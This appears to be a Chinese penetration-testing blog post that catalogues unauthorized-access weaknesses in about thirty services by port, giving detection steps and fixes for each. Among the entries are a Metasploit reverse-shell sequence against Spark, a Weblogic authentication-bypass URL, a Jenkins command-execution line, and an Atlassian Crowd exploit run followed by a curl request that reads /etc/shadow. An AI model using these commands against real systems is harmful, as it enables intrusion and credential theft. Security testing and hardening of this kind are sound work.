【总结】未授权访问
此博客总结了未授权访问,方便自己进行渗透测试
- 此博客总结的大多未授权,都是端口,或者某项应用,不包括一些特有的未授权访问
- 漏洞发现的方法:端口扫描、目录探测
[21] FTP 未授权访问
漏洞简介
风险等级: 高危
FTP 弱口令或匿名登录漏洞,一般指使用 FTP 的用户启用了匿名登录功能,或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等,容易被黑客攻击,发生恶意文件上传或更严重的入侵行为。
影响版本:全版本
匿名访问:
- 用户名:anonymous 密码:空或guest或任意邮箱
- 用户名:FTP 密码:空或FTP
未授权访问:
- 不需要用户名密码可直接访问,一般出现在局域网中
漏洞详情
FTP是文件传输协议(File Transfer Protocol)的缩写,是用于在网络上进行文件传输的一套标准协议,它工作在 OSI 模型的第七层, TCP 模型的第四层, 即应用层, 使用 TCP 传输的, 客户在和服务器建立连接前要经过一个“三次握手”的过程, 保证客户与服务器之间的连接是可靠的, 而且是面向连接, 为数据传输提供可靠保证。
FTP允许用户以文件操作的方式(如文件的增、删、改、查、传送等)与另一主机相互通信。然而,用户并不需要真正登陆到自己想要存取的计算机上面而成为完全用户,可用FTP程序访问远程资源,实现用户往返传输文件、目录管理以及访问电子邮件等等,即使双方计算机可能配有不同的操作系统和文件存储方式。
如果目标开启了匿名FTP服务,匿名FTP允许任意用户通过FTP来访问开放的目录和文件来进行信息收集进行下一步的攻击。使用匿名访问FTP服务可以尝试在Kali中nc:xxx.xxx.xxx.xxx,使用 anonymous和空密码认证。
漏洞检测
1、扫描端口
对端口进行扫描,扫到21端口开放,就可能存在未授权访问
2、浏览器直接访问ftp://ip:port/
存在未授权访问的,就直接能看到文件了
漏洞修复
- 禁止匿名登录
- 配置强密码。密码长度建议八位以上,且密码应包括大小写字母、特殊字符、数字混合体;
[389] LDAP 未授权访问
漏洞简介
LDAP中文全称为:轻型目录访问协议(Lightweight Directory Access Protocol),默认使用389, LDAP 底层一般使用 TCP 或 UDP 作为传输协议。目录服务是一个特殊的数据库,是一种以树状结构的目录数据库为基础。未对LDAP的访问进行密码验证,导致未授权访问。
漏洞检测
1、端口扫描
2、使用nmap寻找到相关的LDAP服务器,可以使用ldapbrowser工具(下载:https://ldapbrowserwindows.com/)直接连接,获取目录内容。
漏洞修复
- 修改ldap的acl,禁止匿名访问
- 根据业务设置ldap访问白名单或黑名单
[873] Rsync 未授权访问
漏洞简介
rsync是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件和目录,默认运行在873端口。由于配置不当,导致任何人可未授权访问rsync,上传本地文件,下载服务器文件。
漏洞检测
1、端口扫描
2、root@kali使用Rsync
命令进行检测
1 | rsync rsync://192.168.126.130:873/ |
漏洞修复
- 隐藏掉 module 信息:修改配置文件 list =false。
- 权限控制:不需要写入权限的 module 的设置为只读 Read only = true;
- 网络访问控制:使用安全组策略或白名单限制,只允许必要访问的主机访问;
- 账户认证:只允许指定的用户利用指定的密码使用 rsync 服务;
- 数据加密传输:Rsync 默认没有直接支持加密传输,如果需要 Rsync 同步重要性很高的数据,可以使用 ssh;
[2181] ZooKeeper 未授权访问
漏洞简介
ZooKeeper 是一个分布式的开放源码的分布式应用程序协调服务,ZooKeeper 默认开启在 2181 端口在未进行任何访问控制的情况下攻击者可通过执行 envi 命令获得系统大量的敏感信息包括系统名称Java 环境,任意用户在网络可达的情况下进行为未授权访问并读取数据甚至 kill 服务。
zookeeper有三个端口(可以修改)
- 2181:对cline端提供服务
- 2888:集群内机器通讯使用(Leader监听此端口)
- 3888:选举leader使用
漏洞检测
1、端口扫描,扫到2181端口
2、直接连接 或 获取服务器环境信息
1 | 直接连接 |
漏洞修复
- 为ZooKeeper配置相应的访问权限
- 设置防火墙策略
- 禁止把Zookeeper直接暴露在公网
[2375] Docker 未授权访问
漏洞简介
Docker Remote API未授权访问:在使用docker swarm的时候,管理的docker 节点上会开放一个TCP端口2375,绑定在0.0.0.0上,http访问会返回 404 page not found ,其实这是 Docker Remote API,可以执行docker命令,比如访问 http://host:2375/containers/json 会返回服务器当前运行的 container列表,和在docker CLI上执行 docker ps的效果一样,其他操作比如创建/删除container,拉取image等操作也都可以通过API调用完成。
Docker daemon api是使用url代替命令行来操作docker,docker swarm 是docker下的集群管理工具,在开放2375端口来监听集群容器时,会调用这个api,可以执行docker命令,root权限启动docker情况下可直接可以控制服务器
漏洞检测
1、端口扫描
2、直接输入地址 http://ip:2375/version
。若能访问,证明存在未授权访问漏洞
也可以使用-H参数远程执行命令
1 | docker -H tcp://ip:2375 ps |
漏洞修复
- 对2375端口做网络访问控制,如ACL控制,或者访问规则;
- 修改docker swarm的认证方式,使用TLS认证;
[5000] Docker Registry未授权
漏洞简介
默认5000端口,docker remote api可以执行docker命令,该接口是目的是取代docker 命令界面,通过url操作docker。
漏洞检测
1、端口扫描
http://10.101.20.43:5000/v2/_catalog
漏洞修复
1、设置ACL,只允许信任ip连接对应端口
2、开启TLS,使用生成的证书进行认证
[5601] Kibana 未授权访问
漏洞简介
Kibana如果允许外网访问,没有做安全的登录认证,也会被外部随意访问查看所有的数据,造成少数据泄露
漏洞检测
1、端口扫描
2、直接访问kibana的页面
https://192.168.126.130/app/kibana#
http://192.168.126.130:5601/app/kibana#/
无需账号密码可以登录进入界面
漏洞修复
- 设置kibana监听本地地址,并设置ElasticSearch登录的账号和密码;
- 设置防火墙策略,限定IP访问服务;
[5900/5901] VNC 未授权访问
漏洞简介
VNC 是虚拟网络控制台Virtual Network Console的英文缩写。它是一款优秀的远程控制工具软件由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于 UNXI 和 Linux 的免费开源软件由 VNC Server 和 VNC Viewer 两部分组成。
VNC 默认端口号为 5900、5901。VNC 未授权访问漏洞如被利用可能造成恶意用户直接控制受控主机危害相当严重。
漏洞检测
1、端口扫描
2、使用 VNC 客户端连接主机
VNC-Viewer工具下载(https://www.realvnc.com/en/connect/download/viewer/windows/)
安装过程,双击msi文件一路下一步就可以了。
在 VNC 客户端输入目标服务器IP,之后点击确定、连接,即可成功控制目标服务器
漏洞修复
- 配置 VNC 客户端登录口令认证并配置符合密码强度要求的密码;
- 以最小权限的普通用户身份运行操作系统;
[5984] CouchDB 未授权访问
漏洞简介
Apache CouchDB 是一个开源数据库,默认会在5984端口开放Restful的API接口,如果使用SSL的话就会监听在6984端口,用于数据库的管理功能。其HTTP Server默认开启时没有进行验证,而且绑定在0.0.0.0,所有用户均可通过API访问导致未授权访问。
在官方配置文档中对HTTP Server的配置有WWW-Authenticate:Set this option to trigger basic-auth popup on unauthorized requests,但是很多用户都没有这么配置,导致漏洞产生。
漏洞检测
1、端口扫描
2、未授权访问kali测试命令
curl 192.168.126.130:5984
curl 192.168.126.130:5984/_config
漏洞修复
指定CouchDB绑定的IP (需要重启CouchDB才能生效)在 /etc/couchdb/local.ini 文件中找到 “bind_address = 0.0.0.0” ,把 0.0.0.0 修改为 127.0.0.1 ,然后保存。 注:修改后只有本机才能访问CouchDB。
设置访问密码(需要重启CouchDB才能生效)在 /etc/couchdb/local.ini 中找到“[admins]”字段配置密码。
设置WWW-Authenticate,强制认证。
[6066/8081/8082] Apache Spark 未授权访问
漏洞简介
Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。如果管理节点未启动访问控制,攻击者可以在集群中执行任意代码。该漏洞的本质是未授权用户可以向Master节点提交一个应用,Master节点会分发给Slave节点执行应用。如果应用中包含恶意代码,会导致任意代码执行,威胁Spark集群整体的安全性。
漏洞检测
nmap扫描出如下端口开放,则很有可能存在漏洞(6066,8081,8082)
使用msf工具getshell
msf5>use exploit/linux/http/spark_unauth_rce
msf5>set payload java/meterpreter/reverse_tcp
msf5>set rhost 192.168.100.2
msf5>set rport 6066
msf5>set lhost 192.168.100.1
msf5>set lport 4444
msf5>set srvhost 192.168.100.1
msf5>set srvport 8080
msf5>exploit
漏洞修复
- 对外关闭敏感端口;
- 配置用户权限认证;
[6379] Redis 未授权访问
漏洞简介
redis是一个数据库,默认端口是6379,redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器。
Redis未授权访问在4.x/5.0.5以前版本下,可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。
漏洞检测
端口扫描
Kali连接主机
(1)kali安装redis-cli远程连接工具
wget http://download.redis.io/redis-stable.tar.gz
tar -zxvf redis-stable.tar.gz
cd redis-stable
make
cp src/redis-cli /usr/bin/
redis-cli -h
(2)使用redis-cli命令直接远程免密登录redis主机
redis-cli -h 目标主机IP
(3)尝试keys * 命令,若存在以下页面,则存在漏洞
(4)进一步利用
利用redis 可视化工具Another Redis Desktop Manager
漏洞修复
到redis安装目录下,配置redis.conf文件:
1、默认只对本地开放
bind 127.0.0.1
2、添加登陆密码
修改 redis.conf 文件,添加
requirepass mypasswd
3、在需要对外开放的时候修改默认端口(端口不重复就可以)
port 2344
4、以低权限运行 Redis 服务(重启redis才能生效)
为 Redis 服务创建单独的用户和家目录,并且配置禁止登陆
5、最后还可以配合iptables限制开放
[7001] Weblogic 未授权访问
漏洞简介
Weblogic是Oracle公司推出的J2EE应用服务器,CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台。
CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。
漏洞检测
1、端口扫描
2、使用vulhub搭建漏洞演示环境
cd vulhub/weblogic/CVE-2020-14882
sudo docker-compose up –d
攻击者可以构造特殊请求的URL,即可未授权访问到管理后台页面:
http://192.168.126.130:7001/console/css/%252e%252e%252fconsole.portal
远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic Server Console 执行任意代码。
漏洞修复
- 下载补丁程序并安装更新;
[8088] HadoopYARN 未授权访问
漏洞简介
Hadoop是一款由Apache基金会推出的分布式系统框架,它通过著名的MapReduce算法进行分布式处理,Yarn是Hadoop集群的资源管理系统。
此次事件主要因HadoopYARN资源管理系统配置不当,导致可以未经授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过RESTAPI部署任务来执行任意指令,最终完全控制服务器。
漏洞检测
1、端口扫描
2、使用vulhub搭建漏洞演示环境
1 cd /vulhub/hadoop/unauthorized-yarn
2 docker-compose up -d
3、环境启动后,没有配置身份认证,可以未授权访问到Hadoop YARN ResourceManager WebUI页面。
1 http://192.168.126.130:8088/
2 http://192.168.126.130:8088/cluster
利用该漏洞,可以进一步getshell
漏洞修复
- 升级Hadoop到x版本以上,并启用Kerberos认证功能,禁止匿名访问;
- 设置“安全组”访问控制策略,将 Hadoop 默认开放的多个端口对公网全部禁止或限制可信任的 IP 地址才能访问包括 50070 以及 WebUI 等相关端口;
- 如无必要,关闭 Hadoop Web 管理页面;
[8080] JBoss 未授权访问
漏洞简介
漏洞简述JBOSS 企业应用平台EAP是 J2EE 应用的中间件平台。默认情况下访问 http://ip:8080/jmx-console,就可以浏览 Jboss 的部署管理的信息不需要输入用户名和密码可以直接部署上传木马有安全隐患
漏洞检测
1、端口扫描
2、直接访问 http://ip:port/,看是否能进入 jmx-console 和 web-console 页面
漏洞修复
- 添加 JMX 控制页面身份认证;
- 进行JMX Console 安全配置;
- 关闭jmx-console和web-console;
[8080] Jenkins 未授权访问
漏洞简介
默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进脚本执行界面从而获取服务器权限。
漏洞检测
1、端口扫描
2、直接通过url输入以下地址,若能访问,证明存在未授权访问漏洞。
http://
http://
未授权访问 http://
# 命令格式
println ‘whoami’.execute().text
漏洞修复
- 对后台控制页面做登录验证限制;
- 升级Jenkins至新版本;
- 禁止把Jenkins直接暴露在公网;
[8080/10250] Kubernetes Api Server 未授权
漏洞简介
Kubernetes 的服务在正常启动后会开启两个端口:Localhost Port (默认8080)、Secure Port (默认6443)。这两个端口都是提供 Api Server 服务的,一个可以直接通过 Web 访问,另一个可以通过 kubectl 客户端进行调用。如果运维人员没有合理的配置验证和权限,那么攻击者就可以通过这两个接口去获取容器的权限。
漏洞检测
1、端口扫描
使用nmap寻找相关的端口和服务,直接访问脆弱的服务
2、检测
(1)端口:8080 http://10.10.4.89:8080/
(2)端口:8080:api dashboard:http://10.10.4.89:8080/ui
(3)端口:10250端口是kubelet API的HTTPS端口,通过路径:https://xxx/10250/pods获取环境变量、运行的容器信息、命名空间等信息。
漏洞修复
- 进行授权认证;
- 使用Service Account令牌;
- 设置防火墙策略,限定IP访问服务;
[8161] Active MQ 未授权访问
漏洞简介
ActiveMQ 是一款流行的开源消息服务器。默认情况下,ActiveMQ 服务是没有配置安全参数。恶意人员可以利用默认配置弱点发动远程命令执行攻击,获取服务器权限,从而导致数据泄露。
漏洞检测
默认端口:8161
默认密码:admin/admin
漏洞修复
针对未授权访问,可修改conf/jetty.xml文件,bean id为securityConstraint下的authenticate修改值为true,重启服务即可。
针对弱口令,可修改conf/jetty.xml文件,bean id 为securityLoginService下的conf值获取用户properties,修改用户名密码,重启服务即可。
[8888] Jupyter Notebook 未授权访问
漏洞简介
Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。
漏洞检测
1、使用vulhub搭建漏洞演示环境
cd /vulhub/jupyter/notebook-rce
docker-compose up -d
2、端口扫描
3、访问http://your-ip:8888,将看到Jupyter Notebook的Web管理界面,并没有要求填写密码。
选择 new -> terminal 即可创建一个控制台:
直接执行任意命令:
漏洞修复
- 开启身份验证,防止未经授权用户访问;
- 访问控制策略,限制IP访问,绑定固定IP;
[9200/9300] Elasticsearch 未授权访问(9200、9300)
漏洞简介
Elasticsearch是一款java编写的企业级搜索服务。越来越多的公司使用ELK作为日志分析,启动此服务默认会开放9200端口或者9300端口,可被非法操作数据。
漏洞检测
1、端口扫描
2、浏览器访问测试命令
http://localhost:9200/_cat/indices
http://localhost:9200/_river/_search //查看数据库敏感信息
http://localhost:9200/_nodes //查看节点数据
如有安装head插件:
http://localhost:9200/_plugin/head/ //web管理界面
漏洞修复
- 访问控制策略,限制IP访问,绑定固定IP;
- 在config/elasticsearch.yml中为9200端口设置认证等;
[10051] Zabbix 未授权访问
漏洞简介
zabbix是一款服务器监控软件,默认服务开放端口为10051,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。
漏洞检测
1、端口扫描
2、无需账户密码直接访问zabbix页面
漏洞修复
- 设置zabbix的复杂口令,不要用默认口令或弱口令,禁用guest登录功能;
- zabbix的server和agent都不要以root启动,不要设置AllowRoot=1;
- 禁止agent执行run,不要设置EnableRemoteCommands=1;
[11211] Memcached 未授权访问
漏洞简介
Memcached 端口对外开放并且没有配置认证选项,未授权用户可直接获取数据库中所有信息,造成严重的信息泄露。
漏洞检测
1、端口扫描
2、无需用户名密码,可以直接连接memcache 服务的11211端口
telnet 10.10.4.89 11211
# 或者
nc -vv 11211
使用了 stats 命令来输出 Memcached 服务信息
漏洞修复
- 修改绑定的IP、端口和指定访问者IP;
- 设置防火墙策略;
- 禁止暴露在公网;
- 配置memcached监听本地回环地址
- 127.0.0.1;
[15672/15692/25672] RabbitMQ 未授权访问
漏洞简介
RabbitMQ是目前非常热门的一款消息中间件,基于AMQP协议的,可以在发布者和使用者之间交换异步消息。消息可以是人类可读的JSON,简单字符串或可以转换为JSON字符串的值列表。
漏洞检测
1、端口扫描
2、浏览器访问测试
默认账号密码都是guest
漏洞修复
- 修改为强密码,删除默认的账号guest;
- 禁止对外网开放,仅限于内部访问;
[27017] MongoDB 未授权访问
漏洞简介
开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作(增、删、改、查高危动作)而且可以远程访问数据库。
造成未授权访问的根本原因就在于启动 Mongodb 的时候未设置 –auth 也很少会有人会给数据库添加上账号密码(默认空口令),使用默认空口令这将导致恶意攻击者无需进行账号认证就可以登陆到数据服务器。
漏洞检测
1、端口扫描
2、kali安装mongodb,然后直接连接到服务。
yum install mongodb
mongo –host 10.2.20.34 –port 27017
漏洞修复
- 限制绑定IP,启动时加入参数–bind_ip 127.0.0.1或在/etc/mongodb.conf文件中添加以下内容:bind_ip = 127.0.0.1;
- 在system.users中添加用户,启动认证;
- 设置防火墙策略,限定 IP 访问服务;
- 禁用HTTP和REST端口,修改配置文件或在启动的时候选择参数nohttpinterface=false;
[2049/20048] NFS 未授权访问
漏洞简介
Network File System(NFS),是由SUN公司研制的UNIX表示层协议(pressentation layer protocol),能使使用者访问网络上别处的文件就像在使用自己的计算机一样。服务器在启用nfs服务以后,由于nfs服务未限制对外访问,导致共享目录泄漏。
漏洞检测
1、端口扫描
2、
#linux安装nfs客户端
apt install nfs-common
#查看nfs服务器上的共享目录
showmount -e 192.168.126.130
#挂载相应共享目录到本地
mount -t nfs 192.168.126.130:/grdata /mnt
#卸载目录
umount /mnt
漏洞修复
- 利用iptables限制端口2049和20048端口的访问,禁止外部访问;
- 设置/etc/exports,对访问进行控制;
[28096] Dubbo 未授权访问
漏洞简介
Dubbo是阿里巴巴公司开源的一个高性能优秀的 服务框架,使得应用可通过高性能的 RPC 实现服务的输 出和输入功能,可以和 Spring框架无缝集成。dubbo 因配置不当导致未授权访问漏洞。
漏洞检测
1、端口扫描
2、连接进入dubbo 服务,进行操作
telent IP port
漏洞修复
- 配置dubbo认证;
- 设置防火墙策略,限定IP访问;
Druid 未授权访问
漏洞简介
Druid是阿里巴巴数据库出品的,为监控而生的数据库连接池,并且Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控,首先Druid是不存在什么漏洞的。但当开发者配置不当时就可能造成未授权访问。
漏洞检测
直接在网站的url中后加上:
1 /druid/index.html
2 /druid/websession.html
3 /druid/datasource.html
4 /druid/sql.html
5 /druid/spring.html
如果可以无需登录,即可登录到Druid监控界面,则说明该网站存在Druid未授权访问漏洞
漏洞修复
- 配置访问账号密码;
- 禁止对外网开放访问;
Solr 未授权访问
漏洞简介
Solr是一个高性能,采用Java开发,基于Lucene的全文搜索服务器。solr的管理界面通常包含如下信息:solr的配置信息(包括路径,用户名,系统版本信息),数据库的配置信息(地址,用户名,密码),数据库搜索数据等。solr未授权访问的危害很大,轻则可查询所有数据库信息,重则可读取系统任意文件,甚至getshell。
漏洞检测
敏感目录扫描时加上一条 /solr/admin
漏洞修复
- 配置solr访问控制权限;
- 禁止将solr暴露在公网;
SpringBoot Actuator 未授权访问
漏洞简介
Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。在 Actuator 启用的情况下,如果没有做好相关权限控制,非法用户可通过访问默认的执行器端点(endpoints)来获取应用系统中的监控信息,从而导致信息泄露甚至服务器被接管的事件发生。
漏洞检测
1、直接访问相关路径:
http://10.2.20.48/actuator/autoconfig
http://10.2.20.48 /actuator/env
http://10.2.20.48/actuator/dump
http://10.2.20.48/actuator/headdump可下载
2、actuator未直接部署在IP根目录下
使用burpsuite的插件:APIKit
介绍:https://www.bilibili.com/read/cv15912732
介绍:https://blog.csdn.net/qq_50854790/article/details/122894291
漏洞修复
- 禁用/env接口;
- 升级到SpringBoot Actuator 2.0;
- 禁止对外开放;
SwaggerUI未授权访问漏洞
漏洞简介
Swagger 是一个规范且完整的框架,用于生成、描述、调用和可视化 RESTful 风格的 Web 服务。
漏洞检测
1、可利用未授权访问漏洞,直接访问以下链接(目录遍历)
1 | /api |
2、swagger-ui未直接部署在IP根目录下
使用burpsuite的插件:APIKit
介绍:https://www.bilibili.com/read/cv15912732
介绍:https://blog.csdn.net/qq_50854790/article/details/122894291
漏洞修复
设置访问权限
Harbor未授权添加管理员漏洞
漏洞简介
Harbor未授权添加任意管理员漏洞。攻击者可通过构造特定的字符串,在未授权的情况下直接创建管理员账号,从而接管Harbor镜像仓库。
漏洞检测
漏洞地址:http://10.101.20.111/harbor/sign-in
漏洞修复
尽快升级到安全版本,下载链接参考:
https://github.com/goharbor/harbor/releases
Windows ipc共享未授权访问漏洞
漏洞简介
漏洞检测
漏洞修复
宝塔phpmyadmin未授权访问
漏洞简介
宝塔Linux面板7.4.2版本和Windows面板6.8版本存在phpmyadmin未授权访问漏洞
phpmyadmin未鉴权,可通过特定地址直接登录数据库的漏洞。
漏洞检测
1、目录扫描:/pma 或者 /phpmyadmin
2、漏洞URL:http://ip:888/pma
即可直接登录(但要求必须安装了phpmyadmin)
漏洞修复
WordPress未授权访问漏洞
漏洞简介
漏洞检测
漏洞修复
Atlassian Crowd 未授权访问
漏洞简介
Atlassian Crowd是一套基于Web的单点登录系统。该系统为多用户、网络应用程序和目录服务器提供验证、授权等功能。Atlassian Crowd Data Center是Crowd的集群部署版。
Atlassian Crowd和Crowd Data Center在其某些发行版本中错误地启用了pdkinstall开发插件,使其存在安全漏洞。攻击者利用该漏洞可在未授权访问的情况下对Atlassian Crowd和Crowd Data Center安装任意的恶意插件,执行任意代码/命令,从而获得服务器权限。
漏洞检测
漏洞利用脚本github地址:https://github.com/jas502n/CVE-2019-11580
git clone https://github.com/jas502n/CVE-2019-11580
cd CVE-2019-11580/
python CVE-2019-11580.py http://192.168.18.138:8095
curl http://192.168.18.138:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow
漏洞修复
设置访问/crowd/admin/uploadplugin.action的源ip。
升级最新版本(3.5.0以上)。